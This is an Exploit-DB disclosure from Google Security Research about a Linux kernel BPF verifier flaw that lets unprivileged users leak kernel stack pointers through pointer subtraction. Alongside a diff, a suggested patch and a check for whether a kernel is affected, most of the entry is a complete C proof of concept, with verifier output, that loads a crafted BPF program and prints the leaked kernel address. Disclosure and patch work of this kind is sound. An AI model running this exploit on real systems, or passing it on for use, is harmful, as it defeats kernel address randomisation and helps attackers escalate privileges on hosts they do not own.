- EDB-ID: 45557
- EDB Verified: Passed
- Author: GOOGLE SECURITY RESEARCH
- Vulnerability type: DoS
- Platform: Linux
- CVE: N/A
- Date published: 2018-10-08
Linux - Kernel Pointer Leak via BPF
/*
Commit 82abbf8d2fc46d79611ab58daa7c608df14bb3ee ("bpf: do not allow root to mangle valid pointers", first in v4.15) included the following snippet:
=========
@@ -2319,43 +2307,29 @@ static int adjust_reg_min_max_vals(struct bpf_verifier_env *env,
 	if (src_reg->type != SCALAR_VALUE) {
 		if (dst_reg->type != SCALAR_VALUE) {
 			/* Combining two pointers by any ALU op yields
-			 * an arbitrary scalar.
+			 * an arbitrary scalar. Disallow all math except
+			 * pointer subtraction
 			 */
-			if (!env->allow_ptr_leaks) {
-				verbose(env, "R%d pointer %s pointer prohibited\n",
-					insn->dst_reg,
-					bpf_alu_string[opcode >> 4]);
-				return -EACCES;
+			if (opcode == BPF_SUB){
+				mark_reg_unknown(env, regs, insn->dst_reg);
+				return 0;
 			}
-			mark_reg_unknown(env, regs, insn->dst_reg);
-			return 0;
+			verbose(env, "R%d pointer %s pointer prohibited\n",
+				insn->dst_reg,
+				bpf_alu_string[opcode >> 4]);
+			return -EACCES;
 		} else {
=========
This allows an unprivileged user to subtract any two values that don't have type SCALAR_VALUE, and obtain a result with type SCALAR_VALUE.
One obvious way in which this is dangerous is a subtraction between PTR_TO_STACK and PTR_TO_MAP_VALUE_OR_NULL: if the PTR_TO_MAP_VALUE_OR_NULL-typed value is NULL at runtime, the subtraction evaluates to fp - 0, so the resulting register holds the raw kernel stack pointer while the verifier treats it as a harmless scalar, and this directly leaks the kernel stack pointer.
I think that pointer-pointer subtractions should only be permitted when it can be proven that both pointers point into the same object.
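A minimal hardening in that spirit (only a sketch of re-imposing the unprivileged restriction, not necessarily the exact upstream patch, and weaker than the same-object check suggested above) would be to gate the pointer-subtraction special case on allow_ptr_leaks, so that unprivileged programs fall through to the existing "pointer %s pointer prohibited" error:
=========
			if (opcode == BPF_SUB && env->allow_ptr_leaks) {
				mark_reg_unknown(env, regs, insn->dst_reg);
				return 0;
			}
=========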
I have attached a PoC. BPF disassembly and output:
==============
user@debian:~/bpf_ptrleak_nullsub$ gcc -o ptrleak_nullsub ptrleak_nullsub.c && ./ptrleak_nullsub
==========================
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -4
4: (62) *(u32 *)(r2 +0) = 9
5: (85) call bpf_map_lookup_elem#1
6: (bf) r9 = r10
7: (1f) r9 -= r0
8: (18) r1 = 0x0
10: (bf) r2 = r10
11: (07) r2 += -4
12: (62) *(u32 *)(r2 +0) = 0
13: (85) call bpf_map_lookup_elem#1
14: (55) if r0 != 0x0 goto pc+1
R0=inv0 R9=inv(id=0) R10=fp0,call_-1
15: (95) exit
from 14 to 16: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=inv(id=0) R10=fp0,call_-1
16: (7b) *(u64 *)(r0 +0) = r9
R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=inv(id=0) R10=fp0,call_-1
17: (b7) r0 = 0
18: (95) exit
processed 17 insns (limit 131072), stack depth 4
==========================
leaked pointer: 0xffff9ec802103c78
user@debian:~/bpf_ptrleak_nullsub$
==============
*/
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/socket.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_FUNC_trace_printk 6
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
	((struct bpf_insn) { \
		.code = BPF_LD | BPF_DW | BPF_IMM, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = (__u32) (IMM) }), \
	((struct bpf_insn) { \
		.code = 0, /* zero is reserved opcode */ \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = ((__u64) (IMM)) >> 32 })

#define BPF_LD_MAP_FD(DST, MAP_FD) \
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_MOV64_REG(DST, SRC) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_MOV | BPF_X, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = 0 })

#define BPF_ALU64_IMM(OP, DST, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
	((struct bpf_insn) { \
		.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = OFF, \
		.imm = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = OFF, \
		.imm = IMM })

#define BPF_EMIT_CALL(FUNC) \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_CALL, \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = (FUNC) })

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = OFF, \
		.imm = IMM })

#define BPF_EXIT_INSN() \
	((struct bpf_insn) { \
		.code = BPF_JMP | BPF_EXIT, \
		.dst_reg = 0, \
		.src_reg = 0, \
		.off = 0, \
		.imm = 0 })

#define BPF_ALU64_REG(OP, DST, SRC) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST, \
		.src_reg = SRC, \
		.off = 0, \
		.imm = 0 })

#define BPF_MOV64_IMM(DST, IMM) \
	((struct bpf_insn) { \
		.code = BPF_ALU64 | BPF_MOV | BPF_K, \
		.dst_reg = DST, \
		.src_reg = 0, \
		.off = 0, \
		.imm = IMM })
/* minimal wrapper around the bpf(2) syscall */
int bpf_(int cmd, union bpf_attr *attrs) {
	return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

/* create a BPF_MAP_TYPE_ARRAY map with 4-byte keys */
int array_create(int value_size, int num_entries) {
	union bpf_attr create_map_attrs = {
		.map_type = BPF_MAP_TYPE_ARRAY,
		.key_size = 4,
		.value_size = value_size,
		.max_entries = num_entries
	};
	int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
	if (mapfd == -1)
		err(1, "map create");
	return mapfd;
}

/* read an 8-byte value out of the array map from userspace */
uint64_t array_get_dw(int mapfd, uint32_t key) {
	uint64_t value = 0;
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (uint64_t)&key,
		.value = (uint64_t)&value,
		.flags = BPF_ANY,
	};
	int res = bpf_(BPF_MAP_LOOKUP_ELEM, &attr);
	if (res)
		err(1, "map lookup elem");
	return value;
}

/* load a socket filter program and dump the verifier log */
int prog_load(struct bpf_insn *insns, size_t insns_count) {
	char verifier_log[100000];
	union bpf_attr create_prog_attrs = {
		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
		.insn_cnt = insns_count,
		.insns = (uint64_t)insns,
		.license = (uint64_t)GPLv2,
		.log_level = 1,
		.log_size = sizeof(verifier_log),
		.log_buf = (uint64_t)verifier_log
	};
	int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
	int errno_ = errno;
	printf("==========================\n%s==========================\n", verifier_log);
	errno = errno_;
	if (progfd == -1)
		err(1, "prog load");
	return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
	int progfd = prog_load(insns, insns_count);

	// hook eBPF program up to a socket
	// sendmsg() to the socket will trigger the filter
	// returning 0 in the filter should toss the packet
	int socks[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
		err(1, "socketpair");
	if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
		err(1, "setsockopt");
	return socks[1];
}

void trigger_proc(int sockfd) {
	if (write(sockfd, "X", 1) != 1)
		err(1, "write to proc socket failed");
}

int main(void) {
	int small_map = array_create(8, 1);

	struct bpf_insn insns[] = {
		// load NULL pointer, tracked as "NULL or value pointer", into r0
		BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
		BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
		BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 9), // oob index
		BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),

		// compute r9 = laundered_frame_pointer
		BPF_MOV64_REG(BPF_REG_9, BPF_REG_FP),
		BPF_ALU64_REG(BPF_SUB, BPF_REG_9, BPF_REG_0),

		// store r9 into map
		BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
		BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
		BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
		BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
		BPF_EXIT_INSN(),
		BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_9, 0),

		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
	trigger_proc(sock_fd);
	printf("leaked pointer: 0x%lx\n", array_get_dw(small_map, 0));
}
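
/*
 * Optional, hypothetical helper (not part of the original PoC): when run as an
 * unprivileged user (and assuming unprivileged BPF is enabled at all), it tries
 * to load a tiny program whose only interesting instruction is a
 * pointer-pointer subtraction. If the verifier accepts the load, the kernel
 * still permits the primitive abused above; if the load is rejected, the
 * restriction is in place. This is only a sketch under those assumptions.
 */
int kernel_allows_unpriv_ptr_sub(void) {
	struct bpf_insn insns[] = {
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_FP),          // r2 = fp (PTR_TO_STACK)
		BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_FP), // r2 -= fp (pointer - pointer)
		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	union bpf_attr attrs = {
		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
		.insn_cnt = ARRSIZE(insns),
		.insns = (uint64_t)insns,
		.license = (uint64_t)GPLv2
	};
	int progfd = bpf_(BPF_PROG_LOAD, &attrs);
	if (progfd == -1)
		return 0;
	close(progfd);
	return 1;
}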
- Source: www.exploit-db.com